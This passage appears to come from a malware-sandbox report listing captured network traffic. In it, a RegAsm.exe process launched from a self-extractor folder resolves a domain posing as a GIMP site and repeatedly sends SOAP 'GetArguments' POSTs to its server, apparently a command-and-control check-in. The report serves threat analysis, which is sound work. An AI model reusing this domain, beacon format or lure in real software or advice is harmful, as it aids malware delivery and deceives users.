                                                                                                                        Jan 17, 2025 06:53:59.214375019 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.214732885 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.219662905 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.279678106 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.284851074 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.386310101 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.386833906 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.391659975 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.435997963 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.440977097 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.541879892 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.542294979 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.547164917 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.592120886 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.597441912 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.698050022 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.698374987 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.703629971 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.748395920 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.753601074 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.853921890 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.854224920 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.859457016 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.904511929 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.909455061 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.009922981 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.010211945 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.015134096 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.060822964 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.065692902 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.175395966 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.175729036 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.180849075 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.217168093 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.222282887 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.329998970 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.330281019 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.335201025 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.373373032 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.378340006 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.485892057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.486196995 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.491127968 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.529540062 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.534492970 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.642875910 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.643142939 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.648761988 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.685894012 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.691790104 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.797838926 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.798136950 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.803014040 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.841941118 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.846890926 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.953946114 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.954320908 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:00.959378958 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:00.998198986 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.003736973 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.110124111 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.110316992 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.115154982 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.154623985 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.159703016 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.266222954 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.266383886 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.271229029 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.310823917 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.316015959 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.422068119 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.424346924 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.429187059 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.467139006 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.472153902 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.583077908 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.591609001 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.596502066 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.640422106 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.645512104 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.745847940 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.747329950 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.752177954 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.799237967 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.804178953 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.905710936 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.910543919 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.915601015 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:01.951348066 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:01.956175089 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.078547001 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.078737974 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.083620071 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.107538939 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.112499952 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.233943939 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.234111071 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.238996983 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.263837099 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.268767118 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.389806986 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.390059948 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.395024061 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.420466900 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.425487995 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.545931101 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.546134949 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.551105022 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.576296091 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.581278086 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.702394009 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.702721119 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.707629919 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.732749939 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.737920046 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.857983112 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.880525112 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.891866922 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:02.904568911 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:02.909498930 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.042483091 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.042668104 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.047574997 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.076227903 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.081187010 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.198723078 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.198887110 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.203782082 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.245291948 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.250274897 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.354504108 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.354662895 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.359549046 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.388744116 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.393805981 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.510231018 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.514158010 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.519062042 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.569631100 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.574783087 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.675441980 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.675570965 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.680566072 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.701206923 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.706104994 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.833153009 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.833285093 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.839291096 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.857547998 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.863806963 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.988148928 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:03.988462925 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:03.993673086 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.013950109 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.019087076 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.142520905 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.142730951 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.147646904 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.170206070 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.175122976 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.298993111 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.299139023 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.304064989 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.326333046 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.331207037 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.454514980 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.454709053 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.459660053 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.486108065 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.491019011 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.610255003 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.654202938 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.889226913 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.894802094 CET804985776.223.67.189192.168.2.5

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 17, 2025 06:52:01.755155087 CET6485353192.168.2.51.1.1.1
                                                                                                                        Jan 17, 2025 06:52:01.763448954 CET53648531.1.1.1192.168.2.5
                                                                                                                        Jan 17, 2025 06:52:44.856071949 CET5120453192.168.2.51.1.1.1
                                                                                                                        Jan 17, 2025 06:52:44.868612051 CET53512041.1.1.1192.168.2.5

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Jan 17, 2025 06:52:01.755155087 CET192.168.2.51.1.1.10xfbd1Standard query (0)FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmroA (IP address)IN (0x0001)false
                                                                                                                        Jan 17, 2025 06:52:44.856071949 CET192.168.2.51.1.1.10x5188Standard query (0)gimpimageeditor.comA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Jan 17, 2025 06:52:01.763448954 CET1.1.1.1192.168.2.50xfbd1Name error (3)FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmrononenoneA (IP address)IN (0x0001)false
                                                                                                                        Jan 17, 2025 06:52:44.868612051 CET1.1.1.1192.168.2.50x5188No error (0)gimpimageeditor.com76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                        Jan 17, 2025 06:52:44.868612051 CET1.1.1.1192.168.2.50x5188No error (0)gimpimageeditor.com13.248.213.45A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • gimpimageeditor.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.54985776.223.67.189801520C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 17, 2025 06:52:44.892592907 CET240OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 17, 2025 06:52:45.248487949 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:45.369277000 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:46.420725107 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:46.527645111 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:46.530457020 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:47.547288895 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:47.817423105 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:47.817642927 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:48.832890034 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:48.938832998 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:48.942007065 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:49.951782942 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:50.058213949 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:50.058486938 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:51.061075926 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:51.179018974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:51.180867910 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:52.186068058 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:52.291687965 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:52.291882992 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:53.295722008 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:53.401093960 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:53.401448965 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:54.404709101 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:54.510353088 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:54.510521889 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:55.514197111 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:55.620016098 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
